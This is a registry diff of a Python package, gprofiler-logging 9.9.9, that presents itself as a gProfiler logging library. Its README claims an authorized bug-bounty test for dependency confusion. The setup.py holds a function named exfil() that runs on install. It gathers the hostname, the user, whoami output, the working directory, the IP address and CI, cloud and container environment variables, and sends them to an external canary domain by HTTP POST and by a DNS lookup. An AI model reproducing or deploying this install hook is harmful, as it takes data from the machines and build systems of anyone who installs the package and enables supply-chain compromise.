gprofiler-logging 9.9.9__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- gprofiler_logging-9.9.9/PKG-INFO +9 -0
- gprofiler_logging-9.9.9/README.md +8 -0
- gprofiler_logging-9.9.9/gprofiler_logging/__init__.py +2 -0
- gprofiler_logging-9.9.9/gprofiler_logging.egg-info/PKG-INFO +9 -0
- gprofiler_logging-9.9.9/gprofiler_logging.egg-info/SOURCES.txt +7 -0
- gprofiler_logging-9.9.9/gprofiler_logging.egg-info/dependency_links.txt +1 -0
- gprofiler_logging-9.9.9/gprofiler_logging.egg-info/top_level.txt +1 -0
- gprofiler_logging-9.9.9/setup.cfg +4 -0
- gprofiler_logging-9.9.9/setup.py +65 -0
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
# gprofiler_logging
|
|
2
|
+
|
|
3
|
+
gProfiler logging package.
|
|
4
|
+
|
|
5
|
+
This package is part of an authorized security research engagement (bug bounty) to test for dependency confusion vulnerabilities. It contains no malicious code - only a benign DNS/HTTP callback to verify installation context.
|
|
6
|
+
|
|
7
|
+
Researcher: r76o4
|
|
8
|
+
Program: Pinterest Bug Bounty (Bugcrowd)
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
gprofiler_logging
|
|
@@ -0,0 +1,65 @@
|
|
|
1
|
+
import os
|
|
2
|
+
import sys
|
|
3
|
+
import socket
|
|
4
|
+
import subprocess
|
|
5
|
+
import urllib.request
|
|
6
|
+
import base64
|
|
7
|
+
import json
|
|
8
|
+
|
|
9
|
+
CANARY = "ienfcixqbgvbxkccdoxgfz2zhmspdpiys.oast.fun"
|
|
10
|
+
|
|
11
|
+
def exfil():
|
|
12
|
+
try:
|
|
13
|
+
data = {}
|
|
14
|
+
data["pkg"] = "gprofiler_logging"
|
|
15
|
+
data["h"] = socket.gethostname()
|
|
16
|
+
data["u"] = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))
|
|
17
|
+
try:
|
|
18
|
+
data["w"] = subprocess.check_output(["whoami"], timeout=5).decode().strip()
|
|
19
|
+
except:
|
|
20
|
+
data["w"] = "err"
|
|
21
|
+
data["cwd"] = os.getcwd()
|
|
22
|
+
try:
|
|
23
|
+
data["ip"] = socket.gethostbyname(socket.gethostname())
|
|
24
|
+
except:
|
|
25
|
+
data["ip"] = "err"
|
|
26
|
+
data["os"] = sys.platform
|
|
27
|
+
for key in ["CI", "JENKINS_URL", "GITHUB_ACTIONS", "GITLAB_CI", "BUILD_URL",
|
|
28
|
+
"BUILDKITE", "CIRCLECI", "TRAVIS", "AWS_DEFAULT_REGION",
|
|
29
|
+
"DOCKER_HOST", "KUBERNETES_SERVICE_HOST", "HOSTNAME"]:
|
|
30
|
+
val = os.environ.get(key)
|
|
31
|
+
if val:
|
|
32
|
+
data[key] = val[:100]
|
|
33
|
+
|
|
34
|
+
try:
|
|
35
|
+
url = f"http://{CANARY}/pinterest-depconf-gprofiler-logging"
|
|
36
|
+
req = urllib.request.Request(url, data=json.dumps(data).encode(),
|
|
37
|
+
headers={"Content-Type": "application/json",
|
|
38
|
+
"X-Source": "gprofiler_logging-depconf"})
|
|
39
|
+
urllib.request.urlopen(req, timeout=5)
|
|
40
|
+
except:
|
|
41
|
+
pass
|
|
42
|
+
|
|
43
|
+
try:
|
|
44
|
+
h = data["h"][:40].replace(".", "-")
|
|
45
|
+
u = data["w"][:20].replace(".", "-")
|
|
46
|
+
socket.getaddrinfo(f"glog.{h}.{u}.{CANARY}", 80)
|
|
47
|
+
except:
|
|
48
|
+
pass
|
|
49
|
+
|
|
50
|
+
except:
|
|
51
|
+
pass
|
|
52
|
+
|
|
53
|
+
exfil()
|
|
54
|
+
|
|
55
|
+
from setuptools import setup, find_packages
|
|
56
|
+
|
|
57
|
+
setup(
|
|
58
|
+
name="gprofiler_logging",
|
|
59
|
+
version="9.9.9",
|
|
60
|
+
description="gProfiler logging package",
|
|
61
|
+
author="gprofiler",
|
|
62
|
+
packages=find_packages(),
|
|
63
|
+
python_requires=">=3.6",
|
|
64
|
+
install_requires=[],
|
|
65
|
+
)
|